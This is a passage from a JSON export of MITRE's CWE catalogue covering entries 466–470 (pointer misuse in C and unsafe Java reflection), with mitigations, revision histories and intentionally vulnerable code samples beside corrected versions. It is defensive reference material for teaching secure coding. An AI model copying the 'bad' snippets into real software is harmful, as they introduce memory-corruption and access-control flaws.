Description, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Likelihood_of_Exploit, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Addition of Data-structure Sentinel","attr":{"@_Date":"2008-04-11"}}}},"466":{"attr":{"@_ID":"466","@_Name":"Return of Pointer Value Outside of Expected Range","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A function can return a pointer to memory that is outside of the buffer that the pointer is expected to reference.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Memory","Modify Memory"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Illegal Pointer Value"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}}]},"Notes":{"Note":{"#text":"This entry should have a chaining relationship with CWE-119 instead of a parent / child relationship, however the focus of this weakness does not map cleanly to any existing entries in CWE. A new parent is being considered which covers the more generic problem of incorrect return values. There is also an abstract relationship to weaknesses in which one component sends incorrect messages to another component; in this case, one routine is sending an incorrect value to another.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Illegal Pointer Value","attr":{"@_Date":"2008-04-11"}}}},"467":{"attr":{"@_ID":"467","@_Name":"Use of sizeof() on a Pointer Type","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code calls sizeof() on a malloced pointer type, which always returns the wordsize/8. This can produce an unexpected result if the programmer intended to determine how much memory has been allocated.","Extended_Description":"The use of sizeof() on a pointer can sometimes generate useful information. An obvious case is to find out the wordsize on a platform. More often than not, the appearance of sizeof(pointer) indicates a bug.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"131","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":["Modify Memory","Read Memory"],"Note":"This error can often cause one to allocate a buffer that is much smaller than what is needed, leading to resultant weaknesses such as buffer overflows."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use expressions such as \\"sizeof(*pointer)\\" instead of \\"sizeof(pointer)\\", unless you intend to run sizeof() on a pointer type to gain some platform independence or if you are allocating a variable on the stack."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Care should be taken to ensure sizeof returns the size of the data structure itself, and not the size of the pointer to the data structure.","Body_Text":["In this example, sizeof(foo) returns the size of the pointer.","In this example, sizeof(*foo) returns the size of the data structure and not the size of the pointer."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"double *foo;...foo = (double *)malloc(sizeof(foo));","xhtml:br":["",""]}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"double *foo;...foo = (double *)malloc(sizeof(*foo));","xhtml:br":["",""]}}]},{"Intro_Text":"This example defines a fixed username and password. The AuthenticateUser() function is intended to accept a username and a password from an untrusted user, and check to ensure that it matches the username and password. If the username and password match, AuthenticateUser() is intended to indicate that authentication succeeded.","Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"char *username = \\"admin\\";char *pass = \\"password\\";int AuthenticateUser(char *inUser, char *inPass) {}int main (int argc, char **argv){}","xhtml:br":["","","","","","","","",""],"xhtml:i":"/* Ignore CWE-259 (hard-coded password) and CWE-309 (use of password system for authentication) for this example. */","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Sizeof username = %d\\\\n\\", sizeof(username));printf(\\"Sizeof pass = %d\\\\n\\", sizeof(pass));if (strncmp(username, inUser, sizeof(username))) {}if (! strncmp(pass, inPass, sizeof(pass))) {}else {}","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"printf(\\"Auth failure of username using sizeof\\\\n\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"printf(\\"Auth success of password using sizeof\\\\n\\");return(AUTH_SUCCESS);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"printf(\\"Auth fail of password using sizeof\\\\n\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:i":"/* Because of CWE-467, the sizeof returns 4 on many platforms and architectures. */"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int authResult;if (argc &lt; 3) {}authResult = AuthenticateUser(argv[1], argv[2]);if (authResult != AUTH_SUCCESS) {}else {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Usage: Provide a username and password\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"ExitError(\\"Authentication failed\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAuthenticatedTask(argv[1]);","attr":{"@_style":"margin-left:10px;"}}]}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"pass5passABCDEFGHpassWORD","xhtml:br":["",""]}}],"Body_Text":["In AuthenticateUser(), because sizeof() is applied to a parameter with an array type, the sizeof() call might return 4 on many modern architectures. As a result, the strncmp() call only checks the first four characters of the input password, resulting in a partial comparison (CWE-187), leading to improper authentication (CWE-287).","Because of the partial comparison, any of these passwords would still cause authentication to succeed for the \\"admin\\" user:","Because only 4 characters are checked, this significantly reduces the search space for an attacker, making brute force attacks more feasible.","The same problem also applies to the username, so values such as \\"adminXYZ\\" and \\"administrator\\" will succeed for the username."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Use of sizeof() on a pointer type"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR01-C","Entry_Name":"Do not apply the sizeof operator to a pointer when taking the size of an array"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM35-C","Entry_Name":"Allocate sufficient memory for an object","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP10","Entry_Name":"Incorrect Buffer Length Computation"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-442"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}]}},"468":{"attr":{"@_ID":"468","@_Name":"Incorrect Pointer Scaling","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"In C and C++, one may often accidentally refer to the wrong memory due to the semantics of when math operations are implicitly scaled.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"Programmers may try to index from a pointer by adding a number of bytes. This is incorrect because C and C++ implicitly scale the operand by the size of the data type."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Memory","Modify Memory"],"Note":"Incorrect pointer scaling will often result in buffer overflow conditions. Confidentiality can be compromised if the weakness is in the context of a buffer over-read or under-read."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use a platform with high-level memory abstractions."},{"Phase":"Implementation","Description":"Always use array indexing instead of direct pointer manipulation."},{"Phase":"Architecture and Design","Description":"Use technologies for preventing buffer overflows."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-55"},"Intro_Text":"This example attempts to calculate the position of the second byte of a pointer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int *p = x;char * second_char = (char *)(p + 1);","xhtml:br":""}},"Body_Text":"In this example, second_char is intended to point to the second byte of p. But, adding 1 to p actually adds sizeof(int) to p, giving a result that is incorrect (3 bytes off on 32-bit platforms). If the resulting memory address is read, this could potentially be an information leak. If it is a write, it could be a security-critical write to unauthorized memory-- whether or not it is a buffer overflow. Note that the above code may also be wrong in other ways, particularly in a little endian environment."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Unintentional pointer scaling"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR39-C","Entry_Name":"Do not add or subtract a scaled integer to a pointer","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP08-C","Entry_Name":"Ensure pointer arithmetic is used correctly"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Pointer Arithmetic&#34;, Page 277"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Unintentional Pointer Scaling","attr":{"@_Date":"2008-04-11"}}}},"469":{"attr":{"@_ID":"469","@_Name":"Use of Pointer Subtraction to Determine Size","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application subtracts one pointer from another in order to determine size, but this calculation can be incorrect if the pointers do not exist in the same memory chunk.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Access Control","Integrity","Confidentiality","Availability"],"Impact":["Modify Memory","Read Memory","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity"],"Note":"There is the potential for arbitrary code execution with privileges of the vulnerable program."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Save an index variable. This is the recommended solution. Rather than subtract pointers from one another, use an index variable of the same size as the pointers in question. Use this variable to \\"walk\\" from one pointer to the other and calculate the difference. Always validate this number."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example contains the method size that is used to determine the number of nodes in a linked list. The method is passed a pointer to the head of the linked list.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"struct node {};int size(struct node* head) {}...","xhtml:div":[{"#text":"int data;struct node* next;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"struct node* current = head;struct node* tail;while (current != NULL) {}return tail - head;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"tail = current;current = current-&gt;next;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}],"xhtml:br":["","","","","","","","",""],"xhtml:i":["// Returns the number of nodes in a linked list from","// the given pointer to the head of the list.","// other methods for manipulating the list"]}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...int size(struct node* head) {}","xhtml:br":["","",""],"xhtml:div":{"#text":"struct node* current = head;int count = 0;while (current != NULL) {}return count;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"count++;current = current-&gt;next;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}],"Body_Text":"However, the method creates a pointer that points to the end of the list and uses pointer subtraction to determine the number of nodes in the list by subtracting the tail pointer from the head pointer. There no guarantee that the pointers exist in the same memory area, therefore using pointer subtraction in this way could return incorrect results and allow other unintended behavior. In this example a counter should be used to determine the number of nodes in the list, as shown in the following code."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Improper pointer subtraction"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR36-C","Entry_Name":"Do not subtract or compare two pointers that do not refer to the same array","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in Computation"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Improper Pointer Subtraction","attr":{"@_Date":"2008-04-11"}}}},"470":{"attr":{"@_ID":"470","@_Name":"Use of Externally-Controlled Input to Select Classes or Code (\'Unsafe Reflection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application uses external input with reflection to select which classes or code to use, but it does not sufficiently prevent the input from selecting improper classes or code.","Extended_Description":"If the application uses external inputs to determine which class to instantiate or which method to invoke, then an attacker could supply values to select unexpected classes or methods. If this occurs, then the attacker could create control flow paths that were not intended by the developer. These paths could bypass authentication or access control checks, or otherwise cause the application to behave in an unexpected manner. This situation becomes a doomsday scenario if the attacker can upload files into a location that appears on the application\'s classpath (CWE-427) or add new entries to the application\'s classpath (CWE-426). Under either of these conditions, the attacker can use reflection to introduce new, malicious behavior into the application.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Interpreted","@_Prevalence":"Sometimes"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Reflection Injection"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability","Other"],"Impact":["Execute Unauthorized Code or Commands","Alter Execution Logic"],"Note":"The attacker might be able to execute code that is not directly accessible to the attacker. Alternately, the attacker could call unexpected code in the wrong place or the wrong time, possibly modifying critical system state."},{"Scope":["Availability","Other"],"Impact":["DoS: Crash, Exit, or Restart","Other"],"Note":"The attacker might be able to use reflection to call the wrong code, possibly with unexpected arguments that violate the API (CWE-227). This could cause the application to exit or hang."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"By causing the wrong code to be invoked, the attacker might be able to trigger a runtime error that leaks sensitive information in the error message, such as CWE-536."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Refactor your code to avoid using reflection."},{"Phase":"Architecture and Design","Description":"Do not use user-controlled inputs to select and load classes or code."},{"Phase":"Implementation","Description":"Apply strict input validation by using allowlists or indirect selection to ensure that the user is only selecting allowable classes or code."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A common reason that programmers use the reflection API is to implement their own command dispatcher. The following example shows a command dispatcher that does not use reflection:","Example_Code":[{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"String ctl = request.getParameter(\\"ctl\\");Worker ao = null;if (ctl.equals(\\"Add\\")) {}else if (ctl.equals(\\"Modify\\")) {}else {}ao.doAction(request);","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"ao = new AddCommand();","attr":{"@_style":"margin-left:10px;"}},{"#text":"ao = new ModifyCommand();","attr":{"@_style":"margin-left:10px;"}},{"#text":"throw new UnknownActionError();","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String ctl = request.getParameter(\\"ctl\\");Class cmdClass = Class.forName(ctl + \\"Command\\");Worker ao = (Worker) cmdClass.newInstance();ao.doAction(request);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String ctl = request.getParameter(\\"ctl\\");Class cmdClass = Class.forName(ctl + \\"Command\\");Worker ao = (Worker) cmdClass.newInstance();ao.checkAccessControl(request);ao.doAction(request);","xhtml:br":["","","",""]}}],"Body_Text":["A programmer might refactor this code to use reflection as follows:","The refactoring initially appears to offer a number of advantages. There are fewer lines of code, the if/else blocks have been entirely eliminated, and it is now possible to add new command types without modifying the command dispatcher. However, the refactoring allows an attacker to instantiate any object that implements the Worker interface. If the command dispatcher is still responsible for access control, then whenever programmers create a new class that implements the Worker interface, they must remember to modify the dispatcher\'s access control code. If they do not modify the access control code, then some Worker classes will not have any access control.","One way to address this access control problem is to make the Worker object responsible for performing the access control check. An example of the re-refactored code follows:","Although this is an improvement, it encourages a decentralized approach to access control, which makes it easier for programmers to make access control mistakes. This code also highlights another security problem with using reflection to build a command dispatcher. An attacker can invoke the default constructor for any kind of object. In fact, the attacker is not even constrained to objects that implement the Worker interface; the default constructor for any object in the system can be invoked. If the object does not implement the Worker interface, a ClassCastException will be thrown before the assignment to ao, but if the constructor performs operations that work in the attacker\'s favor, the damage will already have been done. Although this scenario is relatively benign in simple applications, in larger applications where complexity grows exponentially it is not unreasonable that an attacker could find a constructor to leverage as part of an attack."]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-2331","Description":"Database system allows attackers to bypass sandbox restrictions by using the Reflection APi.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2331"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Unsafe Reflection"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC06-J","Entry_Name":"Do not use reflection to increase accessibility of classes, methods, or fields"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM 